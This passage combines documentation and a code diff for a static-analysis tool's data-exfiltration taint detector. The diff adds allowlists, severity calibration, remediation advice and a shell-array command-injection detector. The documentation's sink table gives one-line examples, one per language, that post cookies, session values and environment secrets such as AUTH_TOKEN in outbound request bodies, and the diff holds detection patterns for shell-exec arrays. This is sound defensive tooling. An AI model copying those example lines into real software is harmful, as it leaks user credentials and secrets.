The default sanitizer rules treat the following identifiers as `Sanitizer(data_exfil)` in JavaScript and TypeScript: + +``` +serializeForUpstream +forwardPayload +tracker.send +analytics.track +metrics.report +logEvent +``` + +If your codebase follows this convention, the cap stops firing on these calls automatically. Extend the convention with your own forwarding wrappers via the standard custom-rule path: + +```toml +[[analysis.languages.javascript.rules]] +matchers = ["dispatchTelemetry", "sendToBus"] +kind = "sanitizer" +cap = "data_exfil" +``` + +The rule of thumb: a function that *only* exists to ship a payload to a known boundary belongs in this list. A function that *might* leak (a generic HTTP wrapper, a logging helper that writes to an arbitrary destination) does not. + +### 2. Destination allowlist + +Configure a set of trusted outbound prefixes once and the cap is dropped on every site whose destination argument has a static prefix that begins with one of them: + +```toml +[detectors.data_exfil] +trusted_destinations = [ + "https://api.internal/", + "https://telemetry.example.com/", +] +``` + +Use full origins or origin-pinned paths so a partial-host match across unrelated origins cannot occur. `https://api.` would also match `https://api.evil.example.com/` — the entry must include the path separator (`/`) at the end of the host. + +The match consults the abstract string domain: a literal URL is a static prefix; a template literal `` `https://api.internal/${id}` `` exposes the prefix `https://api.internal/`; a fully dynamic URL has no prefix and the cap fires as usual. + +### 3. Detector-class disable + +Some projects forward user-bound payloads as a matter of architecture. Turn the entire detector class off when the noise is permanent: + +```toml +[detectors.data_exfil] +enabled = false +``` + +`enabled = false` strips `Cap::DATA_EXFIL` from sink caps before event emission, so no `taint-data-exfiltration` finding reaches the report. 
The decision is per-project — other projects loaded by the same `nyx serve` instance keep their own settings. + +## DATA_EXFIL sinks per language + +Sinks Nyx ships with for `Cap::DATA_EXFIL`. The body, headers, or json payload arg fires; the URL arg routes through the SSRF gate and emits `taint-unsanitised-flow` instead. + +| Language | Sinks | Example | +|---|---|---| +| JavaScript, TypeScript | `fetch(url, {body, headers, json})` body-bind, `XMLHttpRequest.prototype.send`, type-qualified `HttpClient.send` | `fetch('/upload', {method: 'POST', body: req.cookies.session})` | +| Python | `requests.post / put / patch` body and json kwargs, `httpx.AsyncClient().post` json kwarg, `aiohttp.ClientSession().post` body, dict round-trip into json | `requests.post('https://api.internal/ingest', json={'k': os.environ.get('SECRET')})` | +| Java | `HttpClient.send` with `BodyPublishers.ofString`, OkHttp `newCall(req).execute` body chain, Apache `HttpClient.execute(HttpPost)`, `RestTemplate.postForEntity / exchange`, `WebClient.post().bodyValue / body` | `client.send(HttpRequest.newBuilder().uri(...).POST(BodyPublishers.ofString(token)).build(), ...)` | +| Go | `http.Post(url, ct, body)` body arg, `http.PostForm` form arg, `(*http.Client).Do(req)` after `http.NewRequest`, `(*http.Request).Body` assignment | `http.Post("https://analytics.internal/track", "text/plain", strings.NewReader(c.Value))` | +| Rust | `reqwest::Client.post().body / json / form / multipart().send()`, `ureq::post().send_string / send_form / send_json`, `surf::post().body_string / body_json`, `hyper::Request::builder().body()` | `reqwest::Client::new().post(url).form(&secret).send()` | +| Ruby | `Net::HTTP.post(uri, body)` body arg, `Net::HTTP::Post.new(uri).body=`, `RestClient.post / put`, `HTTParty.post(url, body: ...)` body | `Net::HTTP.post(URI('https://analytics.internal/track'), "session=#{request.cookies[:auth]}")` | +| C, C++ | `curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body)` and 
`CURLOPT_COPYPOSTFIELDS` gated sinks (macro-arg activation), `CURLOPT_POSTFIELDSIZE` body-bind | `curl_easy_setopt(curl, CURLOPT_POSTFIELDS, getenv("AUTH_TOKEN"));` | +| PHP | `curl_setopt($ch, CURLOPT_POSTFIELDS, $body)`, `Guzzle\Client.post($url, ['body' => $tainted])`, `Symfony\HttpClient->request('POST', $url, ['body' => $tainted])` | `curl_setopt($ch, CURLOPT_POSTFIELDS, $_COOKIE['session']);` | + +Add project-specific sinks with `nyx config add-rule --kind sink --cap data_exfil --matcher <name>` or the equivalent TOML rule. + +## DATA_EXFIL calibration ranges + +`taint-data-exfiltration` is calibrated below the other taint classes on purpose. + +| Source kind | Severity | Confidence ceiling | +|---|---|---| +| Cookie, environment variable | High | Medium | +| Header | Medium | Medium | +| File system, database | Medium | Medium | +| Caught exception | Medium | Low | + +Path-validated flows (`path_validated: true`) drop one severity tier. Confidence drops to Low when the abstract or symbolic domain cannot corroborate a concrete string reaching the outbound payload (for example, when the body comes from a callee with no summary). + +Attack-surface score ranges: + +| Finding shape | Score | +|---|---| +| High DATA_EXFIL, cookie or env source, body confirmed | around 76 | +| Medium DATA_EXFIL, header, fs, db, or caught-exception source | 40 to 45 | +| Low DATA_EXFIL, no abstract corroboration, path-validated | 18 to 25 | + +For reference: High SSRF, SQLi, cmdi land at 76 to 81; Medium taint with env source lands at 45 to 50; AST-only patterns sit around 10. Data-exfil sits below the direct-compromise classes but above informational AST patterns. 
diff --git a/frontend/src/pages/FindingDetailPage.tsx b/frontend/src/pages/FindingDetailPage.tsx index d76d1168..57c49bd7 100644 --- a/frontend/src/pages/FindingDetailPage.tsx +++ b/frontend/src/pages/FindingDetailPage.tsx @@ -594,6 +594,9 @@ function sinkCapKey(finding: FindingView): string | null { const snippet = (finding.evidence?.sink?.snippet || '').toLowerCase(); const rule = finding.rule_id.toLowerCase(); + if (rule.includes('data-exfiltration') || rule.includes('exfil')) + return 'data-exfil'; + if ( /innerhtml|outerhtml|document\.write|dangerouslysetinnerhtml/.test(snippet) ) @@ -615,7 +618,6 @@ function sinkCapKey(finding: FindingView): string | null { if (/readfile|fs\.|open\s*\(|path\.join/.test(snippet)) return 'path'; if (/\bfetch\b|\baxios\b|http\.|request\.|urlopen|curl/.test(snippet)) return 'ssrf'; - if (rule.includes('xss')) return 'xss'; if (rule.includes('sql')) return 'sql'; if (rule.includes('cmd') || rule.includes('command')) return 'cmd-inject'; @@ -663,6 +665,11 @@ const TAINT_REMEDIATION: Record = { 'Replace dynamic code generation with a parser over an allowlisted grammar.', 'If scripting is required, sandbox it (VM / Web Worker with no DOM, seccomp).', ], + 'data-exfil': [ + 'Do not put cookies, session tokens, or env secrets into outbound request bodies.', + 'If the forward is intentional, allowlist the destination under `detectors.data_exfil.trusted_destinations` or route through a named wrapper the engine treats as a data-exfil sanitizer.', + 'Use dedicated server-to-server credentials for the upstream call instead of forwarding the user session.', + ], }; const DEFAULT_TAINT_REMEDIATION: string[] = [ diff --git a/src/ast.rs b/src/ast.rs index 269f16e1..6d3d12b2 100644 --- a/src/ast.rs +++ b/src/ast.rs @@ -145,6 +145,11 @@ fn resolve_file_rel(file_rel: &str, scan_root: Option<&Path>, fallback: &Path) - /// Build a [`Diag`] from a taint [`Finding`], the CFG that produced it, /// the parsed tree (for byte→line/col conversion) and the 
file path. +/// +/// Returns `None` when source-sensitivity gating fully suppresses the +/// finding (the canonical case is a multi-gate `DATA_EXFIL` event whose +/// contributing source is plain user input — see the +/// `effective_caps` strip below). fn build_taint_diag( finding: &crate::taint::Finding, cfg_graph: &crate::cfg::Cfg, @@ -152,7 +157,7 @@ fn build_taint_diag( path: &Path, src: &[u8], scan_root: Option<&Path>, -) -> Diag { +) -> Option { let call_site_byte = cfg_graph[finding.sink].classification_span().0; let call_site_point = byte_offset_to_point(tree, call_site_byte); // `finding.source` should be a NodeIndex valid in this body's CFG, but @@ -373,16 +378,63 @@ fn build_taint_diag( // SSA dispatch) when populated; fall back to the union of all sink-label // caps on the CFG node so legacy paths that build findings without // setting `effective_sink_caps` still pick the right rule id. - let effective_caps = if finding.effective_sink_caps.is_empty() { + let mut effective_caps = if finding.effective_sink_caps.is_empty() { crate::labels::Cap::from_bits_truncate(sink_caps_bits) } else { finding.effective_sink_caps }; + + // Source-sensitivity gate for `DATA_EXFIL`. Plain attacker input echoed + // back into an outbound request body / headers / json is not data + // exfiltration, the user already controls the value, surfacing it as a + // leak is noise (the canonical false-positive class for API gateways + // and telemetry forwarders that proxy `req.body`). A `DATA_EXFIL` + // finding requires the contributing source to be at least `Sensitive` + // (cookies, headers, env, db rows, file reads). Plain user-input + // sources have the cap stripped so the finding either drops entirely + // or downgrades to whatever non-`DATA_EXFIL` cap also applies (e.g. + // SSRF on the URL position of the same `fetch` call). 
+ if effective_caps.contains(crate::labels::Cap::DATA_EXFIL) + && finding.source_kind.sensitivity() < crate::labels::Sensitivity::Sensitive + { + effective_caps.remove(crate::labels::Cap::DATA_EXFIL); + // The multi-gate dispatch produces one finding per (source, sink-cap) + // pair, a body-flow finding's `effective_sink_caps` is exactly the + // cap that fired (e.g. `DATA_EXFIL`). When that single cap is the + // sensitivity-stripped one, the finding has no surviving rationale + // and we drop it entirely rather than reroute it to the generic + // `taint-unsanitised-flow` bucket (which would just re-emit the same + // false positive under a different rule id). Findings with a + // multi-cap `effective_sink_caps` keep their non-DATA_EXFIL caps and + // are routed normally below. + if finding.effective_sink_caps == crate::labels::Cap::DATA_EXFIL { + return None; + } + } + + // DATA_EXFIL routing. + // + // Multi-gate dispatch (JS / Go) emits one event per cap, so by this + // point each finding's `effective_sink_caps` carries exactly one bit + // and the simple `DATA_EXFIL && !SSRF` test routes correctly. Flat- + // rule paths (Java HTTP clients where type-qualified resolution + // attaches both `SSRF` and `DATA_EXFIL` Sink labels to the same call, + // e.g. `client.send(req)` covering both URL and body channels of the + // request value) produce a single dual-cap event. In that case the + // source's sensitivity tier disambiguates: a Sensitive source + // (cookie, header, env, db, session) leaking into an outbound + // request is canonically DATA_EXFIL even if the sink also carries + // an SSRF label, because operator-bound state is not URL-shaped + // attacker input. Plain user input keeps SSRF routing (the typical + // user-controlled-URL pattern). 
+ let is_data_exfil_rule = effective_caps.contains(crate::labels::Cap::DATA_EXFIL) + && !effective_caps.contains(crate::labels::Cap::UNAUTHORIZED_ID) + && (!effective_caps.contains(crate::labels::Cap::SSRF) + || finding.source_kind.sensitivity() >= crate::labels::Sensitivity::Sensitive); + let diag_id = if effective_caps.contains(crate::labels::Cap::UNAUTHORIZED_ID) { "rs.auth.missing_ownership_check.taint".to_string() - } else if effective_caps.contains(crate::labels::Cap::DATA_EXFIL) - && !effective_caps.contains(crate::labels::Cap::SSRF) - { + } else if is_data_exfil_rule { format!( "taint-data-exfiltration (source {}:{})", source_point.row + 1, @@ -396,18 +448,86 @@ fn build_taint_diag( ) }; + // For `DATA_EXFIL` rules, look up which destination object-literal field + // (`body` / `headers` / `json`) the tainted value reached. Each + // [`crate::cfg::GateFilter`] carries `destination_uses` (var names) in + // parallel with `destination_fields` (the field each var was bound to), + // so we walk the gate filter whose `label_caps` includes `DATA_EXFIL` + // and match the tainted var name from the last flow step. Falls back + // to the first non-empty destination field on the matching filter when + // the var-name match fails (e.g. the SSA sink event is reported on a + // copy-propagated value whose name no longer matches the original + // destination ident). `None` when the sink wasn't a destination-aware + // gate (no object literal, or non-fetch sink). 
+ let data_exfil_field: Option = if is_data_exfil_rule { + let last_var = finding + .flow_steps + .last() + .and_then(|s| s.var_name.as_deref()); + let filters = &cfg_graph[finding.sink].call.gate_filters; + filters + .iter() + .find(|f| f.label_caps.contains(crate::labels::Cap::DATA_EXFIL)) + .and_then(|f| { + if let (Some(uses), Some(var)) = (f.destination_uses.as_ref(), last_var) + && let Some(idx) = uses.iter().position(|u| u == var) + { + return f.destination_fields.get(idx).cloned(); + } + f.destination_fields.first().cloned() + }) + } else { + None + }; + + // DATA_EXFIL severity calibration (Phase: detector ranking). + // + // Generic taint severity comes from `severity_for_source_kind`, which + // maps Cookie/Header/Env to High because those sources are spicy + // *as taint roots*. For `DATA_EXFIL` we are scoring the leak class, + // not the source itself: not every Sensitive-tier source is a Secret. + // Cookies and env carry credential / session material whose leakage + // is an immediate disclosure (Secret-tier); request headers, file + // reads, db rows, and caught exceptions are Sensitive but not + // automatically secret, so they downgrade to Medium. Plain user + // input is already stripped above by the source-sensitivity gate, so + // the `_` arm here is reached only by Sensitive sources that are not + // explicit secrets. + let severity = if is_data_exfil_rule { + match finding.source_kind { + crate::labels::SourceKind::Cookie | crate::labels::SourceKind::EnvironmentConfig => { + crate::patterns::Severity::High + } + _ => crate::patterns::Severity::Medium, + } + } else { + severity_for_source_kind(finding.source_kind) + }; + + // DATA_EXFIL: surface the destination field in the message so analysts + // see at a glance whether the leak reached the request body, headers, + // or json payload. Generic taint findings stay on the existing + // "unsanitised … flows from … → …" template. 
+ let message = if is_data_exfil_rule { + let suffix = data_exfil_field + .as_deref() + .map(|f| format!(" ({f} field)")) + .unwrap_or_default(); + format!("sensitive data flows from {short_source} \u{2192} {sink_display}{suffix}") + } else { + format!("unsanitised {kind_label} flows from {short_source} \u{2192} {sink_display}") + }; + let mut diag = Diag { path: primary_path.clone(), line: primary_line, col: primary_col, - severity: severity_for_source_kind(finding.source_kind), + severity, id: diag_id, category: FindingCategory::Security, path_validated: finding.path_validated, guard_kind: finding.guard_kind.map(|k| format!("{k:?}")), - message: Some(format!( - "unsanitised {kind_label} flows from {short_source} \u{2192} {sink_display}" - )), + message: Some(message), labels, confidence: None, evidence: Some(Evidence { @@ -448,6 +568,7 @@ fn build_taint_diag( symbolic: finding.symbolic.clone(), sink_caps: sink_caps_bits, engine_notes: finding.engine_notes.clone(), + data_exfil_field, ..Default::default() }), rank_score: None, @@ -467,7 +588,7 @@ fn build_taint_diag( ev.confidence_limiters = limiters; } - diag + Some(diag) } /// Resolve a file extension to a language slug (e.g. 
`"rust"`, @@ -622,6 +743,8 @@ fn source_kind_label(sk: crate::labels::SourceKind) -> &'static str { use crate::labels::SourceKind; match sk { SourceKind::UserInput => "user input", + SourceKind::Cookie => "cookie value", + SourceKind::Header => "request header", SourceKind::EnvironmentConfig => "environment config", SourceKind::FileSystem => "file system data", SourceKind::Database => "database result", @@ -1198,18 +1321,31 @@ impl<'a> ParsedFile<'a> { continue; } - out.push(build_taint_diag( + if let Some(diag) = build_taint_diag( finding, body_cfg, &self.source.tree, self.source.path, self.source.bytes, scan_root, - )); + ) { + out.push(diag); + } } // ── CFG structural analyses (per body) ───────────────────────── let taint_active = global_summaries.is_some() || !taint_results.is_empty(); + // Pre-compute, per body, the set of variable names whose + // release / close calls live in a NESTED closure body inside + // that body (e.g. `socket.on("close", () => ws.close())`). + // Both the structural ResourceMisuse pass and the state-model + // leak pass consult it to suppress findings whose cleanup is + // registered as a callback the per-body CFG can't follow. + // Only descendants count — sibling methods on the same class + // don't share resource ownership. 
+ let closure_released_per_body = + state::collect_closure_released_var_names(&self.file_cfg.bodies, caller_lang); + let empty_set: std::collections::HashSet = std::collections::HashSet::new(); for body in &self.file_cfg.bodies { let body_taint: Vec<_> = taint_results .iter() @@ -1231,6 +1367,11 @@ impl<'a> ParsedFile<'a> { body_const_facts: body_const_facts.as_ref(), type_facts: body_const_facts.as_ref().map(|f| &f.type_facts), auth_decorators: &body.meta.auth_decorators, + closure_released_var_names: Some( + closure_released_per_body + .get(&body.meta.id) + .unwrap_or(&empty_set), + ), }; for cf in cfg_analysis::run_all(&cfg_ctx) { let point = byte_offset_to_point(&self.source.tree, cf.span.0); @@ -1307,6 +1448,11 @@ impl<'a> ParsedFile<'a> { &body.meta.auth_decorators, &path_safe_suppressed_spans, body_pointer_hints.as_ref(), + Some( + closure_released_per_body + .get(&body.meta.id) + .unwrap_or(&empty_set), + ), ); for sf in &state_findings { diff --git a/src/cfg/cfg_tests.rs b/src/cfg/cfg_tests.rs index 4b5080b3..de7edc0d 100644 --- a/src/cfg/cfg_tests.rs +++ b/src/cfg/cfg_tests.rs @@ -1118,6 +1118,7 @@ fn clone_preserves_all_sub_structs() { arg_string_literals: vec![Some("lit".into())], destination_uses: None, gate_filters: Vec::new(), + is_constructor: false, }, taint: TaintMeta { labels: { diff --git a/src/cfg/helpers.rs b/src/cfg/helpers.rs index 6a582ef6..6c5beb56 100644 --- a/src/cfg/helpers.rs +++ b/src/cfg/helpers.rs @@ -373,11 +373,26 @@ pub(crate) fn first_member_label( if let Some(full) = member_expr_text(n, code) { // Try the full text first, then progressively strip the last segment // to match rules like "process.env" from "process.env.CMD". + // + // The strip-and-retry only ever yields a sound label for Sources: + // `process.env.CMD` → strip → `process.env` makes sense because + // the receiver itself IS the source. 
Sinks and Sanitizers, by + // contrast, name the *operation* — `connection.query`, `eval`, + // `exec` — and stripping a trailing segment to match them is + // not semantically valid (e.g. `exec.start` should never be + // treated as a SHELL_ESCAPE sink because of bare `exec`). We + // accept any label on a full-text match (the behaviour callers + // already depend on for Source/Sink labels alike), but only + // accept Source labels after segment stripping. let mut candidate = full.as_str(); + let mut first = true; loop { if let Some(lbl) = classify(lang, candidate, extra_labels) { - return Some(lbl); + if first || matches!(lbl, DataLabel::Source(_)) { + return Some(lbl); + } } + first = false; match candidate.rsplit_once('.') { Some((prefix, _)) => candidate = prefix, None => break, diff --git a/src/cfg/literals.rs b/src/cfg/literals.rs index 4f2b06c8..7535a18c 100644 --- a/src/cfg/literals.rs +++ b/src/cfg/literals.rs @@ -38,25 +38,27 @@ pub(super) fn find_call_node<'a>(n: Node<'a>, lang: &str) -> Option> { } } -/// Extract identifiers from specified fields of an object-literal argument. +/// Extract `(field_name, ident_name)` pairs from specified fields of an +/// object-literal argument. /// /// Returns: -/// * `Some(names)` if the positional argument at `index` IS an object literal -/// (JS `object`, TS `object`, Python `dictionary`). `names` contains -/// identifiers lifted from pair values whose key matches any entry in -/// `fields` (case-sensitive; JS/TS identifiers). When no destination-field -/// pairs are present, returns `Some(vec![])`, the sink is effectively -/// silenced because no destination identifier exists. +/// * `Some(pairs)` if the positional argument at `index` IS an object literal +/// (JS `object`, TS `object`, Python `dictionary`). Each pair is +/// `(field_name, ident_name)` where `field_name` is the matched key from +/// `fields` and `ident_name` is an identifier lifted from that pair's +/// value expression. 
When no destination-field pairs are present, returns +/// `Some(vec![])`, the sink is effectively silenced because no destination +/// identifier exists. /// * `None` if the arg is absent, is not an object literal (plain string /// / ident / expression), or has splat/spread children that break static /// per-field reasoning. Callers fall back to the whole-arg positional /// filter in this case. -pub(super) fn extract_destination_field_idents( +pub(super) fn extract_destination_field_pairs( call_node: Node, arg_index: usize, fields: &[&str], code: &[u8], -) -> Option> { +) -> Option> { if fields.is_empty() { return None; } @@ -71,7 +73,7 @@ pub(super) fn extract_destination_field_idents( return None; } - let mut out: Vec = Vec::new(); + let mut out: Vec<(String, String)> = Vec::new(); let mut c = arg.walk(); for child in arg.named_children(&mut c) { match child.kind() { @@ -88,8 +90,8 @@ pub(super) fn extract_destination_field_idents( let Some(name) = text_of(child, code) else { continue; }; - if fields.iter().any(|&f| f == name) && !out.contains(&name) { - out.push(name); + if fields.iter().any(|&f| f == name) && !out.iter().any(|(_, v)| v == &name) { + out.push((name.clone(), name)); } } "pair" => { @@ -124,8 +126,8 @@ pub(super) fn extract_destination_field_idents( let mut paths: Vec = Vec::new(); collect_idents_with_paths(val_node, code, &mut idents, &mut paths); for name in paths.into_iter().chain(idents) { - if !out.contains(&name) { - out.push(name); + if !out.iter().any(|(_, v)| v == &name) { + out.push((key.clone(), name)); } } } @@ -135,6 +137,62 @@ pub(super) fn extract_destination_field_idents( Some(out) } +/// Extract `(field_name, ident_name)` pairs from `keyword_argument` / +/// `named_argument` children of a call whose keyword name matches one of +/// `fields`. Used for languages where destination-bearing fields are passed +/// as direct kwargs rather than wrapped in a dict literal, e.g. 
Python +/// `requests.post(url, data=tainted, json=safe)` where `data` and `json` are +/// `keyword_argument` siblings of the positional URL. +/// +/// Returns the union of matching kwargs, preserving the kwarg name in the +/// `field` slot so callers can still attribute findings per-field. Empty +/// when no matching kwargs exist or the call has no `arguments` field. +pub(super) fn extract_destination_kwarg_pairs( + call_node: Node, + fields: &[&str], + code: &[u8], +) -> Vec<(String, String)> { + if fields.is_empty() { + return Vec::new(); + } + let Some(args_node) = call_node.child_by_field_name("arguments") else { + return Vec::new(); + }; + let mut out: Vec<(String, String)> = Vec::new(); + let mut cursor = args_node.walk(); + for child in args_node.named_children(&mut cursor) { + let kind = child.kind(); + if kind != "keyword_argument" && kind != "named_argument" { + continue; + } + let named_count = child.named_child_count(); + let name_node = child + .child_by_field_name("name") + .or_else(|| child.named_child(0)); + let value_node = child + .child_by_field_name("value") + .or_else(|| child.named_child(named_count.saturating_sub(1) as u32)); + let (Some(nn), Some(vn)) = (name_node, value_node) else { + continue; + }; + let Some(name) = text_of(nn, code) else { + continue; + }; + if !fields.iter().any(|&f| f == name) { + continue; + } + let mut idents = Vec::new(); + let mut paths = Vec::new(); + collect_idents_with_paths(vn, code, &mut idents, &mut paths); + for ident in paths.into_iter().chain(idents) { + if !out.iter().any(|(_, v)| v == &ident) { + out.push((name.clone(), ident)); + } + } + } + out +} + /// Extract the string-literal content at argument position `index` (0-based). /// Returns `None` if the argument is not a string literal or the index is out of range. 
pub(super) fn extract_const_string_arg( @@ -144,7 +202,14 @@ pub(super) fn extract_const_string_arg( ) -> Option { let args = call_node.child_by_field_name("arguments")?; let mut cursor = args.walk(); - let arg = args.named_children(&mut cursor).nth(index)?; + let mut arg = args.named_children(&mut cursor).nth(index)?; + // PHP / Go wrap each positional argument in an `argument` node; unwrap so + // the kind-match below sees the inner literal. + if arg.kind() == "argument" && arg.named_child_count() == 1 { + if let Some(inner) = arg.named_child(0) { + arg = inner; + } + } match arg.kind() { // `string` / `string_literal` cover JS/TS, Python, Java, PHP, C/C++, Ruby, Rust; // `interpreted_string_literal` / `raw_string_literal` cover Go's @@ -177,6 +242,39 @@ pub(super) fn extract_const_string_arg( } } +/// Extract a macro-constant or `define`d identifier name at argument position +/// `index` (0-based). Used for languages where activation values are +/// preprocessor symbols rather than string literals — currently C, C++, and +/// PHP define-constants like `CURLOPT_POSTFIELDS` whose syntactic form is an +/// `identifier` / `name` node, not a `string`. +/// +/// Returns `None` for any non-identifier shape so dynamic-activation +/// semantics still apply when the activation arg is a runtime value +/// (variable, expression, function call). +pub(super) fn extract_const_macro_arg( + call_node: Node, + index: usize, + code: &[u8], +) -> Option { + let args = call_node.child_by_field_name("arguments")?; + let mut cursor = args.walk(); + let mut arg = args.named_children(&mut cursor).nth(index)?; + if arg.kind() == "argument" && arg.named_child_count() == 1 { + if let Some(inner) = arg.named_child(0) { + arg = inner; + } + } + match arg.kind() { + // C/C++ identifier / PHP `name` node for define-style constants. + // Scoped C++ identifiers (`Curl::OPT_POSTFIELDS`) and PHP namespaced + // names also surface here so the dangerous_values match catches them. 
+ "identifier" | "name" | "qualified_name" | "scoped_identifier" => { + text_of(arg, code).map(|s| s.to_string()) + } + _ => None, + } +} + /// Extract the value of a keyword argument from a call node (e.g. Python `shell=True`). /// Walks argument children looking for `keyword_argument` nodes, matches the keyword /// name, and extracts the value node text for literals. @@ -1546,6 +1644,59 @@ pub(super) fn def_use( (None, uses, vec![]) } + // for-in / for-of / Python `for x in iter:` ───────────────────────── + // + // Tree-sitter classifies these as `Kind::For` with a `left`/`right` + // field pair (binding pattern + iterable). Without an explicit + // arm here, the default branch collects every ident as a `use` and + // never registers the iteration binding as a `define`, so taint + // entering the iterable does not propagate into the body's + // references to the binding (`for (const [a, b] of obj) { sink(a) }` + // would lose the flow at `a`). + // + // C-style `for_statement` has no `left`/`right` fields (it uses + // `initializer`/`condition`/`increment`), so this path falls through + // to the default-collecting behaviour for those, preserving today's + // semantics. + Kind::For => { + let left = ast.child_by_field_name("left"); + let right = ast.child_by_field_name("right"); + if left.is_none() && right.is_none() { + // C-style for, defer to default ident collection. 
+ let mut idents = Vec::new(); + let mut paths = Vec::new(); + collect_idents_with_paths(ast, code, &mut idents, &mut paths); + let mut uses = paths; + uses.extend(idents); + return (None, uses, vec![]); + } + + let mut defs: Option = None; + let mut extra_defs: Vec = Vec::new(); + let mut uses: Vec = Vec::new(); + + if let Some(pat) = left { + let mut idents = Vec::new(); + let mut paths = Vec::new(); + collect_idents_with_paths(pat, code, &mut idents, &mut paths); + let first = paths.pop().or_else(|| idents.first().cloned()); + for ident in &idents { + if first.as_ref() != Some(ident) { + extra_defs.push(ident.clone()); + } + } + defs = first; + } + if let Some(val) = right { + let mut idents = Vec::new(); + let mut paths = Vec::new(); + collect_idents_with_paths(val, code, &mut idents, &mut paths); + uses.extend(paths); + uses.extend(idents); + } + (defs, uses, extra_defs) + } + // everything else – no definition, but may read vars _ => { let mut idents = Vec::new(); @@ -1557,3 +1708,225 @@ pub(super) fn def_use( } } } + +/// One match from [`extract_shell_array_payload_idents`]. +/// +/// `arg_position` is the positional argument index of the call where the +/// shell-array literal was found. `payload_idents` is the union of +/// identifiers (and dotted paths) lifted from the array's payload elements +/// (positions 2+ for POSIX `sh -c ` form; positions 2+ for `cmd /c ` +/// likewise). Empty `payload_idents` means the payload is a constant string, +/// which the caller should treat as benign (no SHELL_ESCAPE finding possible). +#[derive(Debug, Clone)] +pub(super) struct ShellArrayMatch { + pub arg_position: usize, + pub payload_idents: Vec, +} + +/// Detect inline shell-execution array literals at a call site. 
+/// +/// Recognises the pattern `[, "-c", ]` (POSIX shells) and +/// `[, "/c"|"/C", ]` (Windows `cmd.exe`) appearing as +/// either: +/// * a direct positional argument of `call_node`, or +/// * the value of any field within an object-literal positional argument +/// (covers `container.exec({Cmd: ["bash", "-c", x]})` form). +/// +/// Returns one [`ShellArrayMatch`] per detected shell-array. Empty when the +/// call has no shell-array literals. +/// +/// The shell-name list is intentionally narrow (POSIX shells + Windows +/// `cmd.exe`/`powershell`) to avoid false positives on benign array literals +/// like `["ls", "-la"]` or `["git", "rev-parse", "HEAD"]`, where element 0 is +/// not a shell. Element 1 must be a literal `-c` (POSIX) or `/c`/`/C` (cmd); +/// otherwise the array is not in shell-exec form regardless of element 0. +/// +/// Identifiers from elements at positions 2+ are lifted via +/// [`collect_idents_with_paths`] so template-literal interpolations +/// (`` `echo ${x}` ``), member-expressions (`obj.field`), and bare idents are +/// all captured. Dedup is preserved across array elements so a single ident +/// referenced in multiple payload positions appears once. +pub(super) fn extract_shell_array_payload_idents( + call_node: Node, + code: &[u8], +) -> Vec { + let mut out = Vec::new(); + let Some(args_node) = call_node.child_by_field_name("arguments") else { + return out; + }; + let mut cursor = args_node.walk(); + for (idx, child) in args_node.named_children(&mut cursor).enumerate() { + let kind = child.kind(); + // Splats break positional indexing; bail conservatively on the whole call. + if kind == "spread_element" + || kind == "dictionary_splat" + || kind == "list_splat" + || kind == "splat_argument" + || kind == "hash_splat_argument" + { + return Vec::new(); + } + if kind == "keyword_argument" || kind == "named_argument" { + continue; + } + + // Direct array-literal arg. 
+ if let Some(idents) = shell_array_payload_idents_of(child, code) { + out.push(ShellArrayMatch { + arg_position: idx, + payload_idents: idents, + }); + continue; + } + + // Object-literal arg whose field value is a shell-array literal. + // Covers `container.exec({Cmd: [...]})` form. Field name is not + // restricted to `Cmd` / `cmd`: the shell-shape itself is the gate, + // and the payload extraction is per-array. + if matches!(kind, "object" | "dictionary") { + let mut cc = child.walk(); + for pair in child.named_children(&mut cc) { + if pair.kind() != "pair" { + continue; + } + let Some(val_node) = pair.child_by_field_name("value") else { + continue; + }; + let val_node = unwrap_parens(val_node); + if let Some(idents) = shell_array_payload_idents_of(val_node, code) { + out.push(ShellArrayMatch { + arg_position: idx, + payload_idents: idents, + }); + } + } + } + } + out +} + +/// If `node` is an array literal of shape `[, "-c", *]` (POSIX shells) +/// or `[, "/c", *]` (Windows cmd.exe), return the identifiers +/// referenced in the payload elements (positions 2+). Otherwise return +/// `None`. Returning `Some(vec![])` means the payload is a constant string +/// — caller should still skip emitting a sink (no taint can reach a literal). +fn shell_array_payload_idents_of(node: Node, code: &[u8]) -> Option> { + let node = unwrap_parens(node); + if node.kind() != "array" { + return None; + } + // Walk named children to skip commas and other trivia. + let mut cursor = node.walk(); + let elems: Vec = node.named_children(&mut cursor).collect(); + if elems.len() < 3 { + return None; + } + let shell = const_string_value(elems[0], code)?; + if !is_known_shell(&shell) { + return None; + } + let flag = const_string_value(elems[1], code)?; + if !is_shell_command_flag(&shell, &flag) { + return None; + } + // Lift identifiers from the payload elements (positions 2+). Constants + // contribute nothing. An empty result means the entire payload is + // statically benign. 
+ let mut idents: Vec = Vec::new(); + let mut paths: Vec = Vec::new(); + for elem in &elems[2..] { + collect_idents_with_paths(*elem, code, &mut idents, &mut paths); + } + let mut combined = paths; + combined.extend(idents); + // Dedup (preserve first-seen order). + let mut seen = std::collections::HashSet::new(); + combined.retain(|s| seen.insert(s.clone())); + if combined.is_empty() { + // Static payload — no taint can reach it. Return None so the caller + // does not emit a useless sink filter. + return None; + } + Some(combined) +} + +/// Extract a constant string value from `node`, handling JS/TS `string` / +/// `template_string` (no interpolation) forms. Returns `None` for dynamic +/// values, identifiers, or expressions. +fn const_string_value(node: Node, code: &[u8]) -> Option { + let node = unwrap_parens(node); + match node.kind() { + "string" | "string_literal" | "interpreted_string_literal" | "raw_string_literal" => { + let raw = text_of(node, code)?; + if raw.len() >= 2 { + Some(raw[1..raw.len() - 1].to_string()) + } else { + None + } + } + "template_string" => { + let mut c = node.walk(); + if node + .named_children(&mut c) + .any(|ch| ch.kind() == "template_substitution") + { + return None; + } + let raw = text_of(node, code)?; + if raw.len() >= 2 { + Some(raw[1..raw.len() - 1].to_string()) + } else { + None + } + } + _ => None, + } +} + +/// Known shell executable names that activate the shell-array detector. +/// Scoped narrowly to POSIX shells + Windows command interpreters, listing +/// only canonical names so benign arrays like `["ls", ...]`, `["git", ...]`, +/// or `["python", ...]` do not match. +fn is_known_shell(name: &str) -> bool { + // Strip directory prefix for matching: `/bin/bash` → `bash`. 
